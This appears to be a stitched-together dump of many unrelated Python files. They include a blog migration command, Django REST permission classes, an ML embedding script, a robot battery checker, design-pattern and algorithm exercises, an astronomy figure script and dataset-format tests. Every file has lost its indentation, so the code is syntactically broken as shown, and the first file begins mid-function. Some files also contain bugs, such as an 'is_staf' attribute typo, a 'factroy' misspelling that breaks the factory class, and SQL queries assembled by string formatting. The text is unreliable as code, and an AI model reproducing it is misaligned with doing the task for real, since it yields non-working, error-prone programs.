row = dict(zip(['id', 'basename', 'modified_on', 'title', 'body', 'username', 'email', 'first_name'], row))
print "create user %s" % row['username']
# Ensure the user exists.
try:
user = User.objects.get(username=row['username'])
except User.DoesNotExist:
user = User.objects.create_user(row['username'], row['email'])
user.first_name = row['first_name']
user.save()
# Create the blog post.
self.stdout.write('Create "%s"' % row['title'])
try:
post = Post.objects.get(blog=blog, user=user, slug=row['basename'])
except Post.DoesNotExist:
post = Post.objects.create(blog=blog,
user=user,
title=row['title'] or '<No Title>',
slug=row['basename'][:50],
pub_date=row['modified_on'],
body=row['body'])
# Create the files.
asset_cursor = db.cursor()
asset_cursor.execute('''select a.asset_file_path, a.asset_class
from mt_asset as a, mt_objectasset as oa
where oa.objectasset_object_id = %s
and oa.objectasset_blog_id = %s
and a.asset_id = oa.objectasset_asset_id''' % (row['id'], options['src_blog_id']))
for i, asset in enumerate(list(asset_cursor)):
position = i + 1
asset = dict(zip(['file_path', 'asset_class'], asset))
src_file = asset['file_path'].replace(r'%r', options['root'])
print src_file
dst_file = os.path.join(blog.assets_directory, os.path.basename(asset['file_path']))
if os.path.exists(src_file):
print src_file, "->", dst_file
shutil.copyfile(src_file, dst_file)
Asset.objects.create(post=post,
file_name=os.path.basename(dst_file),
type=asset['asset_class'],
description='',
position=position)
|
python
|
"""Programa 8_5.py
Descrição: Reescrever a função da listagem 8.5 de forma a utilizar os métodos de pesquisa em lista vistos no cap 7.
Autor:Cláudio Schefer
Data:
Versão: 001
"""
# Declaração de variáveis
L = []
valor = int (0)
# Entrada de dados
L = [10, 20, 25, 30]
# Processamento
def pesquise (lista, valor):
if valor in lista:
return lista.index(valor)
return None
# Saída de dados
print(pesquise(L, 25))
print(pesquise(L, 27))
|
python
|
import asyncio
import logging
from timeit import default_timer as timer
from podping_hivewriter.async_context import AsyncContext
from podping_hivewriter.models.podping_settings import PodpingSettings
from podping_hivewriter.podping_settings import get_podping_settings
from pydantic import ValidationError
class PodpingSettingsManager(AsyncContext):
def __init__(self, ignore_updates=False):
super().__init__()
self.ignore_updates = ignore_updates
self.last_update_time = float("-inf")
self._settings = PodpingSettings()
self._settings_lock = asyncio.Lock()
self._startup_done = False
asyncio.ensure_future(self._startup())
async def _startup(self):
if not self.ignore_updates:
self._add_task(asyncio.create_task(self._update_podping_settings_loop()))
self._startup_done = True
async def _update_podping_settings_loop(self):
while True:
try:
await self.update_podping_settings()
await asyncio.sleep(self._settings.control_account_check_period)
except Exception as e:
logging.error(e, exc_info=True)
except asyncio.CancelledError:
raise
async def update_podping_settings(self) -> None:
try:
podping_settings = await get_podping_settings(
self._settings.control_account
)
self.last_update_time = timer()
except ValidationError as e:
logging.warning(f"Problem with podping control settings: {e}")
else:
if self._settings != podping_settings:
logging.debug(
f"Configuration override from Podping Hive: {podping_settings}"
)
async with self._settings_lock:
self._settings = podping_settings
async def get_settings(self) -> PodpingSettings:
async with self._settings_lock:
return self._settings
|
python
|
from rest_framework import permissions
from API.models import *
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the owner of the snippet.
return obj.owner == request.user
class OnlyPMorQALeadCanEdit(permissions.BasePermission):
"""
Custom permission to only allow PM and QA Leads to some object.
"""
def has_object_permission(self, request, view, obj):
if isinstance(obj, Project):
project = obj
elif isinstance(obj, (ProjectTeam, Issue)):
project = obj.project
elif isinstance(obj, (Worklog, IssueAttachment, IssueLink, Comment)):
project = obj.issue.project
else:
return False
leads = ProjectTeam.objects.filter(project=project, team_role__in=['PM', 'QALEAD'])
team = ProjectTeam.objects.filter(project=project)
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD or OPTIONS requests.
if request.method in permissions.SAFE_METHODS and request.user in [member.user for member in team]:
return True
# Write permissions are only allowed to the qa lead or PM
if request.user in [member.user for member in leads]:
return True
# Superuser has full access to all endpoints
return request.user and request.user.is_staff
class IsProjectTeamOnly(permissions.BasePermission):
"""
Custom permission to only allow PM and QA Leads to some object.
"""
def has_object_permission(self, request, view, obj):
if isinstance(obj, Project):
project = obj
elif isinstance(obj, (ProjectTeam, Issue)):
project = obj.project
elif isinstance(obj, (Worklog, IssueAttachment, IssueLink, Comment)):
project = obj.issue.project
else:
return False
team = ProjectTeam.objects.filter(project=project)
# Write permissions are only allowed to the project team
if request.user in [member.user for member in team]:
return True
# Superuser has full access to all endpoints
return request.user and request.user.is_staf
|
python
|
WORD_EMBEDDING_FILE = './data/GoogleNews-vectors-negative300.txt'
WORD_EMBEDDING_BIN_FILE = './bin/unigram_embedding.pkl'
LOW_FREQ_TOKEN_FILE = './bin/unigram_low_freq_voc.pkl'
EMBEDDING_SIZE = 300
if __name__ == "__main__":
from preprocess.data import GigawordRaw, ParaphraseWikiAnswer
from gensim.models import Word2Vec
import os
import sys
import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
if os.path.exists(WORD_EMBEDDING_FILE):
logging.info("Word embedding text file exists, exit")
sys.exit(0)
class Raw():
def __iter__(self):
sentences = GigawordRaw()
for sentence in sentences:
yield sentence
sentences = ParaphraseWikiAnswer(mode='raw_token')
for sentence_pair in sentences:
for i in sentences.sent_indx:
yield sentence_pair[i]
sentences = Raw()
# calculate embedding vector
logging.info("Generating embedding vectors")
model = Word2Vec(sentences, size=EMBEDDING_SIZE, window=5, min_count=1, workers=40)
model.save_word2vec_format(WORD_EMBEDDING_FILE, binary=False)
|
python
|
print('Vamos somar alguns números: ')
for c in range(1, 501):
if c % 3 == 0:
print(c)
|
python
|
#!/usr/bin/python
"""
Check current Husky battery status (via ROS)
usage:
./battery.py [<node IP> <master IP> | -m <metalog> [F]]
"""
import sys
import os
from huskyros import HuskyROS
# apyros should be common lib - now in katarina code
from apyros.sourcelogger import SourceLogger
from apyros.metalog import MetaLog, disableAsserts
def battery( metalog, assertWrite, ipPair ):
if metalog is None:
metalog = MetaLog()
robot = HuskyROS( filename=metalog.getLog("node"), replay=metalog.replay, ipPair=ipPair )
else:
robot = HuskyROS( filename=metalog.getLog("node"), replay=True, assertWrite=assertWrite, ipPair=ipPair ) # TODO move assert to metalog
scannerFn = SourceLogger( sourceGet=None, filename=metalog.getLog("scanner") ).get
robot.setSpeedPxPa( 0, 0 )
for i in xrange(10):
robot.update()
print "Battery: %.3f" % robot.power
if __name__ == "__main__":
if len(sys.argv) < 3:
print __doc__
sys.exit(1)
metalog = None
assertWrite = True
ipPair = None
if sys.argv[1] == '-m':
metalog = MetaLog( filename = sys.argv[2] )
if len(sys.argv) > 3 and sys.argv[3] == 'F':
assertWrite = False
disableAsserts()
else:
ipPair = ( sys.argv[1], 'http://'+sys.argv[2]+':11311' )
battery( metalog, assertWrite, ipPair )
#-------------------------------------------------------------------
# vim: expandtab sw=4 ts=4
|
python
|
import os
import tkinter.filedialog as tk
import natsort
pot = '/media/vid/DLS DATA/seq4Amod35/2112'
seznam = os.listdir(pot)
seznam = natsort.natsorted(seznam)
key = 'OHL'
temp = []
for i in seznam:
if key in i:
print(i)
if '.txt' in i:
continue
with open(pot + '/' + i, encoding='windows-1250') as file:
next(file)
for line in file:
temp.append(line)
print(len(temp))
# print(temp)
f = open(pot + '//' + key[:4] + '.txt', 'w')
for j in range(len(temp)):
f.write(temp[j])
# print(temp[j])
f.close()
|
python
|
#Will take a directory full of covariance models and feed them to Infernal's cmcalibrate one at a time.
#The resulting covariance models are put in sys.argv[3].
#This script may take several days to complete. Calibrating models of large alignments is slow.
#Necessary modules: biopython, infernal
#Usage: python Infernal_cmcalibrate.py <directory of cov models> <directory of stockholm alignments> <directory in which to put calibrated models>
import sys
import os
from Bio import AlignIO
import subprocess
import shutil
def runcmcalibrate(modelname):
subprocess.check_call(['cmcalibrate', modelname])
def calibratemodels(modelsdirectory, stockholmdirectory, calibratedmodelsdirectory):
modelcounter = 0
calibratedmodelcounter = 0
modelsdirectory = os.path.abspath(modelsdirectory)
stockholmdirectory = os.path.abspath(stockholmdirectory)
models = [os.path.join(modelsdirectory, model) for model in os.listdir(modelsdirectory)]
#If calibratedmodelsdirectory doesn't exist, make it
if os.path.exists ('./' + str(calibratedmodelsdirectory)) == False:
os.mkdir('./' + str(calibratedmodelsdirectory))
for model in models:
modelcounter +=1
if modelcounter % 10 == 0:
sys.stderr.write('Calibrating model {0} of {1}.\n'.format(modelcounter, len(models)))
#Get corresponding stockholm alignment
#if calibrated model doesn't already exist in calibratedmodelsdirectory
if os.path.exists(str(os.path.abspath(calibratedmodelsdirectory) + '/' +
str(os.path.basename(model.replace('.cm', '.c.cm'))))) == False:
stockholmalignmentname = os.path.basename(model.replace('.cm',''))
stockholmalignment = os.path.join(stockholmdirectory, stockholmalignmentname)
#Only calibrate models where the alignment is less than 2 kb.
#Otherwise it takes forEVER. Still, expect an average of hours per alignment.
alignment_length = AlignIO.read(stockholmalignment, 'stockholm').get_alignment_length()
if alignment_length >= 10 and alignment_length <= 4000:
runcmcalibrate(model)
#Move calibrated model to its correct directory
shutil.copy2(str(model), str(os.path.abspath(calibratedmodelsdirectory)) + '/' +
str(os.path.basename(model.replace('.cm','.c.cm'))))
calibratedmodelcounter +=1
sys.stderr.write('Calibrated {0} of {1} models. The rest were too big.\n'.format(calibratedmodelcounter, len(models)))
if __name__ == '__main__':
calibratemodels(sys.argv[1], sys.argv[2], sys.argv[3])
|
python
|
outputText = """Yesterday I went to see {0}.
To be honest, I thought it was pretty good.
It's a good effort by {1}.
I hadn't seen a plot move quite as fluidly as it did in {0},
but {1} does have a good hand for it."""
print('What movie are we reviewing')
movie = input().title()
print('And who directs it?')
director = input().title()
print( outputText.format(movie,director) )
|
python
|
class ControllerSettings:
def __init__(self, powerslide, air_roll, air_roll_left, air_roll_right, boost, jump, ball_cam, brake, throttle):
self.powerslide = powerslide
self.air_roll = air_roll
self.air_roll_left = air_roll_left
self.air_roll_right = air_roll_right
self.boost = boost
self.jump = jump
self.ball_cam = ball_cam
self.brake = brake
self.throttle = throttle
|
python
|
import os
import nbformat
def get_cur_dir():
return os.path.abspath(os.path.dirname(__file__))
def get_par_dir():
return os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def gen_items(path):
for item in os.listdir(path):
path_item = os.path.abspath(os.path.join(path, item))
assert os.path.exists(path_item), f"Missing : {path_item}"
yield path_item
def gen_folders(path=get_par_dir()):
for item in gen_items(path):
if os.path.isdir(item):
yield item
def gen_files(path, ext='ipynb'):
for item in gen_items(path):
if os.path.isfile(item):
if os.path.splitext(item)[-1].endswith(ext):
yield item
def gen_ipynb_files_above(path=get_par_dir(), ext='ipynb'):
for folder in gen_folders(path):
for file in gen_files(folder, ext):
yield file
def gen_cells(ipynb_file):
nb = nbformat.read(ipynb_file, nbformat.NO_CONVERT)
for cell in nb['cells']:
yield cell
def get_source_from_cell(cell):
assert isinstance(cell, nbformat.notebooknode.NotebookNode), repr(cell)
return cell['source']
def add_two_returns_if_missing(cell_source):
if cell_source.endswith('\n\n'):
pass
elif cell_source.endswith('\n'):
cell_source += '\n'
else:
cell_source += '\n\n'
return cell_source
def process_cell(cell):
cell['source'] = add_two_returns_if_missing(
get_source_from_cell(cell)
)
return cell
def process_file(input_ipynb_filename, output_ipynb_filename=None):
if output_ipynb_filename is None:
output_ipynb_filename = input_ipynb_filename
nb = nbformat.read(input_ipynb_filename, nbformat.NO_CONVERT)
for cell in nb['cells']:
process_cell(cell)
nbformat.write(nb, output_ipynb_filename)
def main():
for ipynb_file in gen_ipynb_files_above():
print(f'processing {ipynb_file}', end=' ')
process_file(ipynb_file)
print('done')
if "__main__" == __name__:
main()
|
python
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# File name: test.py
# First Edit: 2020-03-19
# Last Change: 19-Mar-2020.
"""
This scrip is for test
"""
amount_dict = {"high": 1.2, "normal": 1.0, "low": 0.8}
def main():
factorya = AbstractPizzaFactory(PizzaFactoryA())
pizza1 = factorya.make_pizza("high")
pizza1.check_pizza()
print("-----")
factoryb = AbstractPizzaFactory(PizzaFactoryB())
pizza2 = factoryb.make_pizza("normal")
pizza2.check_pizza()
# AbstractFactory
class AbstractPizzaFactory:
def __init__(self, pizza_factory, amount_str="normal"):
self.factroy = pizza_factory
def make_pizza(self, amount_str):
amount = amount_dict[amount_str]
self.pizza_materials = []
self.pizza_materials.append(self.factory.add_dough(amount))
self.pizza_materials.append(self.factory.add_source(amount))
self.pizza_materials.append(self.factory.add_topping(amount))
def check_pizza(self):
for pizza_material in self.pizza_materials:
pizza_material.check()
# createproduct
def add_dough(self, amount=1):
pass
# createproduct
def add_source(self, amount=1):
pass
# createproduct
def add_topping(self, amount=1):
pass
# ConcreteFactory
class PizzaFactoryA(AbstractPizzaFactory):
def __init__(self):
pass
# createproduct
def add_dough(self, amount=1):
return WheatDough(amount)
# createproduct
def add_source(self, amount=1):
return TomatoSource(amount)
# createproduct
def add_topping(self, amount=1):
return CoanTopping(amount)
# ConcreteFactory
class PizzaFactoryB(AbstractPizzaFactory):
def __init__(self):
pass
# createproduct
def add_dough(self, amount=1):
return RiceFlourDough(amount)
# createproduct
def add_source(self, amount=1):
return BasilSource(amount)
# createproduct
def add_topping(self, amount=1):
return CheeseTopping(amount)
# この場合は__init__は共通のため、子クラスでは__init__しません。
# ConcreteProduct
class Dough:
def __init__(self, amount):
self.amount = amount
def check(self):
pass
# ConcreteProduct
class WheatDough(Dough):
def check(self):
print("Wheat(amount: {})".format(self.amount))
# ConcreteProduct
class RiceFlourDough(Dough):
def check(self):
print("FlourDough(amount: {})".format(self.amount))
# ConcreteProduct
class Source:
def __init__(self, amount):
self.amount = amount
def check(self):
pass
# ConcreteProduct
class TomatoSource(Source):
def check(self):
print("Tomato(amount: {})".format(self.amount))
# ConcreteProduct
class BasilSource(Source):
def check(self):
print("Basil(amount: {})".format(self.amount))
# ConcreteProduct
class Topping:
def __init__(self, amount):
self.amount = amount
def check(self):
pass
# ConcreteProduct
class CoanTopping(Topping):
def check(self):
print("Coan(amount: {})".format(self.amount))
# ConcreteProduct
class CheeseTopping(Topping):
def check(self):
print("Cheese(amount: {})".format(self.amount))
if __name__ == "__main__":
main()
|
python
|
'''
最长公共子序列
描述
给定两个字符串,返回两个字符串的最长公共子序列(不是最长公共子字符串),可能是多个。
输入
输入为两行,一行一个字符串
输出
输出如果有多个则分为多行,先后顺序不影响判断。
输入样例
1A2BD3G4H56JK
23EFG4I5J6K7
输出样例
23G456K
23G45JK
'''
'''
d为方向矩阵
1:上
2:左上
3:左
4:左or上
'''
def LCS (a, b):
C = [[0 for i in range(len(b) + 1)] for i in range(len(a) + 1)] # 定义矩阵C保存最长公共子序列长度
d = [[0 for i in range(len(b) + 1)] for i in range(len(a) + 1)] # 定义矩阵path保存最长公共子序列查找方向
for i in range(1, len(a) + 1):
for j in range(1, len(b) + 1):
if a[i - 1] == b[j - 1]:
C[i][j] = C[i - 1][j - 1] + 1
d[i][j] = 1 # 左上
elif C[i][j - 1] < C[i - 1][j]:
C[i][j] = C[i - 1][j]
d[i][j] = 2 # 上
elif C[i][j - 1] > C[i - 1][j]:
C[i][j] = C[i][j - 1]
d[i][j] = 3 # 左
else: # C[i][j - 1] == C[i - 1][j]
C[i][j] = C[i - 1][j]
d[i][j] = 4 # 左or上
maxLen = C[len(a)][len(b)]
lcs = ""
printLCS(d, a, lcs, 1, maxLen, len(a), len(b))
def printLCS (d, a, s, curLen, maxLen, i, j):
if i == 0 or j == 0:
return None
dir = d[i][j]
if dir == 1:
if curLen == maxLen:
s += a[i - 1]
s = s[::-1]
strDict[s] = i - 1
elif curLen < maxLen:
s += a[i - 1]
printLCS(d, a, s, curLen + 1, maxLen, i - 1, j - 1)
elif dir == 2:
printLCS(d, a, s, curLen, maxLen, i - 1, j)
elif dir == 3:
printLCS(d, a, s, curLen, maxLen, i, j - 1)
elif dir == 4:
printLCS(d, a, s, curLen, maxLen, i - 1, j)
printLCS(d, a, s, curLen, maxLen, i, j - 1)
if __name__ == '__main__':
a = input().strip()
b = input().strip()
strDict = dict()
LCS(a, b)
for key in strDict.keys():
print(key)
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script to convert YOLO keras model to an integer quantized tflite model
using latest Post-Training Integer Quantization Toolkit released in
tensorflow 2.0.0 build
"""
import os, sys, argparse
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
from yolo3.data import get_ground_truth_data
from common.utils import get_custom_objects
#tf.enable_eager_execution()
def post_train_quant_convert(keras_model_file, annotation_file, sample_num, model_input_shape, output_file):
#get input_shapes for converter
input_shapes=list((1,)+model_input_shape+(3,))
with open(annotation_file) as f:
annotation_lines = f.readlines()
custom_object_dict = get_custom_objects()
model = load_model(keras_model_file, custom_objects=custom_object_dict)
converter = tf.lite.TFLiteConverter.from_keras_model(model)
def data_generator():
n = len(annotation_lines)
i = 0
for num in range(sample_num):
image, _ = get_ground_truth_data(annotation_lines[i], model_input_shape, augment=True)
i = (i+1) % n
image = np.array([image], dtype=np.float32)
yield [image]
converter.optimizations = [tf.lite.Optimize.DEFAULT]
#converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
#converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_LATENCY]
converter.representative_dataset = tf.lite.RepresentativeDataset(data_generator)
#converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
tflite_model = converter.convert()
with open(output_file, "wb") as f:
f.write(tflite_model)
def main():
parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS, description='TF 2.x post training integer quantization converter')
parser.add_argument('--keras_model_file', required=True, type=str, help='path to keras model file')
parser.add_argument('--annotation_file', required=True, type=str, help='annotation txt file to feed the converter')
parser.add_argument('--sample_num', type=int, help='annotation sample number to feed the converter,default 30', default=30)
parser.add_argument('--model_input_shape', type=str, help='model image input shape as <num>x<num>, default 416x416', default='416x416')
parser.add_argument('--output_file', required=True, type=str, help='output tflite model file')
args = parser.parse_args()
height, width = args.model_input_shape.split('x')
model_input_shape = (int(height), int(width))
post_train_quant_convert(args.keras_model_file, args.annotation_file, args.sample_num, model_input_shape, args.output_file)
if __name__ == '__main__':
main()
|
python
|
from taskcontrol.lib import EPubSubBase
def run(data):
print("Running Pubsub ", data)
def publisher(data):
print("Running publisher ", data)
def subscriber(data):
print("Running subscriber ", data)
config = {"name": "new", "handler": run, "queue": None, "maxsize": 10,
"queue_type": "queue", "processing_flag": False, "batch_interval": 5, "events": {}}
name = config.get("name")
pb = EPubSubBase()
p = pb.pubsub_create(config)
if p:
print("Event registered ", pb.register_event(name, {"name": "testevent", "event": run}))
print("Event listened ", pb.listen(name, "testevent"))
print("Publisher registered ", pb.register_publisher(name, {"name": "pubone", "event_name": "testevent", "publisher": publisher}))
print("Subscribers registered ", pb.register_subscriber(name, {"name": "subone", "event_name": "testevent", "subscriber": subscriber}))
print("Subscribers registered ", pb.register_subscriber(name, {"name": "subtwo", "event_name": "testevent", "subscriber": subscriber}))
print("Event sending ", pb.send({"event_name": "testevent", "queue_name": "new", "message": "Testing event testevent", "publisher": "pubone"}))
print("Publisher unregistered ", pb.unregister_publisher(name, {"name": "pubone", "event_name": "testevent"}))
print("Subscriber unregistered ", pb.unregister_subscriber(name, {"name": "subone", "event_name": "testevent"}))
print("Subscriber unregistered ", pb.unregister_subscriber(name, {"name": "subtwo", "event_name": "testevent"}))
print("Pubsub Object PRINT FROM SCRIPT: ", pb.fetch(name))
print("Event unlistened ", pb.stop(name, "testevent"))
print("Pubsub Object Deleted ", pb.pubsub_delete(name))
print("Pubsub Object (Should return Error for handling) ", pb.fetch(name))
|
python
|
import numpy as np
import os
import sys
from astropy.io import fits
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
plt.style.use('araa')
from matplotlib import rc
rc('text.latex', preamble=r'\usepackage{amsmath}')
rc("font", **{"family": "serif", "serif": ["Palatino"]})
rc("text", usetex = True)
from matplotlib.colorbar import Colorbar
from matplotlib import mlab, cm
from astropy.visualization import (AsinhStretch, LinearStretch, ImageNormalize)
from matplotlib.patches import Ellipse
from matplotlib.font_manager import FontProperties
# set up plots
fig = plt.figure(figsize=(6.33, 2.1))
gs = gridspec.GridSpec(1, 3)
xlims = [4.2017, -4.2017]
ylims = [-4.2017, 4.2017]
ax0 = fig.add_subplot(gs[0,0])
ax0.set_xlim(xlims)
ax0.set_ylim(ylims)
ax0.set_xticklabels([])
ax0.set_yticklabels([])
ax1 = fig.add_subplot(gs[0,1])
ax1.set_xlim(xlims)
ax1.set_ylim(ylims)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
ax2 = fig.add_subplot(gs[0,2])
ax2.set_xlim(xlims)
ax2.set_ylim(ylims)
ax2.set_xticklabels([])
ax2.set_yticklabels([])
# annotations
ax0.text(0.08, 0.91, 'a', transform=ax0.transAxes,
horizontalalignment='right', color='w', fontsize=15,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax1.text(0.08, 0.91, 'b', transform=ax1.transAxes,
horizontalalignment='right', color='w', fontsize=15,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax2.text(0.08, 0.91, 'c', transform=ax2.transAxes,
horizontalalignment='right', color='w', fontsize=15,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax0.text(0.96, 0.03, '\\textit{scattered light}', transform=ax0.transAxes,
horizontalalignment='right', color='w', fontsize=11,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax1.text(0.96, 0.03, '\\textit{thermal continuum}', transform=ax1.transAxes,
horizontalalignment='right', color='w',fontsize=11,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
ax2.text(0.96, 0.03, '\\textit{spectral line emission}',
transform=ax2.transAxes,
horizontalalignment='right', color='w',fontsize=11,
bbox={'facecolor': 'black', 'alpha': 0.8, 'pad': 2})
# SCATTERED LIGHT
hdulist = fits.open('data/Hband_Qr_cleaned.fits_smooth')
Iscat = hdulist[0].data[0]
hdr = hdulist[0].header
nx, ny = hdr['NAXIS1'], hdr['NAXIS2']
cellsize = 12.25 * 1e-3 # in arcseconds (based on IRDIS plate scale)
RA, DEC = np.meshgrid(cellsize*(np.arange(nx)-0.5*nx+0.5), \
cellsize*(np.arange(ny)-0.5*ny+0.5))
ext = (np.max(RA), np.min(RA), np.min(DEC), np.max(DEC))
norm = ImageNormalize(vmin=10, vmax=45, stretch=LinearStretch())
im = ax0.imshow(Iscat, origin='lower', cmap='afmhot', extent=ext,
aspect='equal', norm=norm)
beam = Ellipse((xlims[0] + 0.08*np.diff(xlims), xlims[1] - 0.06*np.diff(xlims)),
0.049, 0.049, 0.)
beam.set_facecolor('w')
ax0.add_artist(beam)
#ax0.plot([-5,5],[0,0],'green')
#ax0.plot([0,0],[-5,5],'green')
# MM CONTINUUM
idir = '/pool/asha0/TALKS/2017/Texas/data/'
hdulist = fits.open(idir+'B6B7_cont.image.tt0.fits')
Imm = np.squeeze(hdulist[0].data)
hdr = hdulist[0].header
beam = (np.pi/180.)**2 * np.pi * hdr['BMAJ'] * hdr['BMIN'] / (4.*np.log(2.))
nu = hdr['CRVAL3']
cc, kk = 2.9979e10, 1.381e-16
Tb = (1e-23 * Imm / beam) * cc**2 / (2.*kk*nu**2)
RA = 3600. * hdr['CDELT1'] * (np.arange(hdr['NAXIS1'])-(hdr['CRPIX1']-1))
DEC = 3600. * hdr['CDELT2'] * (np.arange(hdr['NAXIS2'])-(hdr['CRPIX2']-1))
ext = (np.max(RA)-0.012, np.min(RA)-0.012, np.min(DEC)-0.015, np.max(DEC)-0.015)
norm = ImageNormalize(vmin=0, vmax=40, stretch=AsinhStretch())
im = ax1.imshow(Tb, origin='lower', cmap='inferno', extent=ext,
aspect='equal', norm=norm)
beam = Ellipse((xlims[0] + 0.08*np.diff(xlims), xlims[1] - 0.06*np.diff(xlims)),
hdr['BMAJ']*3600., hdr['BMIN']*3600., 90.-hdr['BPA'])
beam.set_facecolor('w')
ax1.add_artist(beam)
#ax1.plot([-5,5],[0,0],'green')
#ax1.plot([0,0],[-5,5],'green')
# CO
hdulist = fits.open('data/TWHya_CO_highres.pbcor.mom0.clipped.fits')
Ico = np.nan_to_num(np.squeeze(hdulist[0].data))
hdr = hdulist[0].header
RA = 3600. * hdr['CDELT1'] * (np.arange(hdr['NAXIS1'])-(hdr['CRPIX1']-1))
DEC = 3600. * hdr['CDELT2'] * (np.arange(hdr['NAXIS2'])-(hdr['CRPIX2']-1))
ext = (np.max(RA)+0.05, np.min(RA)+0.05, np.min(DEC)-0.05, np.max(DEC)-0.05)
norm = ImageNormalize(vmin=0, vmax=0.3, stretch=AsinhStretch())
im = ax2.imshow(Ico, origin='lower', cmap='bone', extent=ext,
aspect='equal', norm=norm)
beam = Ellipse((xlims[0] + 0.08*np.diff(xlims), xlims[1] - 0.06*np.diff(xlims)),
hdr['BMAJ']*3600., hdr['BMIN']*3600., 90.-hdr['BPA'])
beam.set_facecolor('w')
ax2.add_artist(beam)
#ax2.plot([-5,5],[0,0],'green')
#ax2.plot([0,0],[-5,5],'green')
# adjustments for aesthetic purposes
fig.subplots_adjust(wspace=0.05)
fig.subplots_adjust(left=0.0, right=1.0, bottom=0.01, top=0.99)
fig.savefig('twhya_gallery.pdf')
fig.clf()
|
python
|
from collections import OrderedDict
from functools import partial
from unittest import TestCase
import os
import os.path as osp
import numpy as np
from datumaro.components.annotation import (
AnnotationType, LabelCategories, Mask, MaskCategories,
)
from datumaro.components.dataset import Dataset
from datumaro.components.extractor import DatasetItem, Extractor
from datumaro.plugins.cityscapes_format import (
CityscapesConverter, CityscapesImporter,
)
from datumaro.util.image import Image
from datumaro.util.test_utils import (
IGNORE_ALL, TestDir, compare_datasets, test_save_and_load,
)
import datumaro.plugins.cityscapes_format as Cityscapes
from .requirements import Requirements, mark_requirement
DUMMY_DATASET_DIR = osp.join(osp.dirname(__file__), 'assets',
'cityscapes_dataset')
class CityscapesFormatTest(TestCase):
@mark_requirement(Requirements.DATUM_267)
def test_can_write_and_parse_labelmap(self):
src_label_map = Cityscapes.CityscapesLabelMap
with TestDir() as test_dir:
file_path = osp.join(test_dir, 'label_colors.txt')
Cityscapes.write_label_map(file_path, src_label_map)
dst_label_map = Cityscapes.parse_label_map(file_path)
self.assertEqual(src_label_map, dst_label_map)
class CityscapesImportTest(TestCase):
@mark_requirement(Requirements.DATUM_267)
def test_can_import(self):
# is_crowd marks labels allowing to specify instance id
source_dataset = Dataset.from_iterable([
DatasetItem(id='defaultcity/defaultcity_000001_000031',
subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 0, 0]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 0]]), id=1, label=27,
attributes={'is_crowd': False}),
Mask(np.array([[0, 0, 0, 1, 1]]), id=2, label=27,
attributes={'is_crowd': False}),
]
),
DatasetItem(id='defaultcity/defaultcity_000001_000032',
subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 0, 0]]), id=1, label=31,
attributes={'is_crowd': False}),
Mask(np.array([[0, 0, 1, 0, 0]]), label=12,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
]
),
DatasetItem(id='defaultcity/defaultcity_000002_000045',
subset='train',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 0]]), id=1, label=24,
attributes={'is_crowd': False}),
]
),
DatasetItem(id='defaultcity/defaultcity_000001_000019',
subset = 'val',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), id=24, label=1,
attributes={'is_crowd': False}),
]
),
], categories=Cityscapes.make_cityscapes_categories())
parsed_dataset = Dataset.import_from(DUMMY_DATASET_DIR, 'cityscapes')
compare_datasets(self, source_dataset, parsed_dataset)
@mark_requirement(Requirements.DATUM_267)
def test_can_detect_cityscapes(self):
self.assertTrue(CityscapesImporter.detect(DUMMY_DATASET_DIR))
class TestExtractorBase(Extractor):
def _label(self, cityscapes_label):
return self.categories()[AnnotationType.label].find(cityscapes_label)[0]
def categories(self):
return Cityscapes.make_cityscapes_categories()
class CityscapesConverterTest(TestCase):
def _test_save_and_load(self, source_dataset, converter, test_dir,
target_dataset=None, importer_args=None, **kwargs):
return test_save_and_load(self, source_dataset, converter, test_dir,
importer='cityscapes',
target_dataset=target_dataset, importer_args=importer_args, **kwargs)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_segm(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='defaultcity_1_2', subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[0, 0, 0, 1, 0]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=24, id=1,
attributes={'is_crowd': False}),
Mask(np.array([[1, 0, 0, 0, 1]]), label=15,
attributes={'is_crowd': True}),
]
),
DatasetItem(id='defaultcity_3', subset='val',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 0]]), label=5,
attributes={'is_crowd': True}),
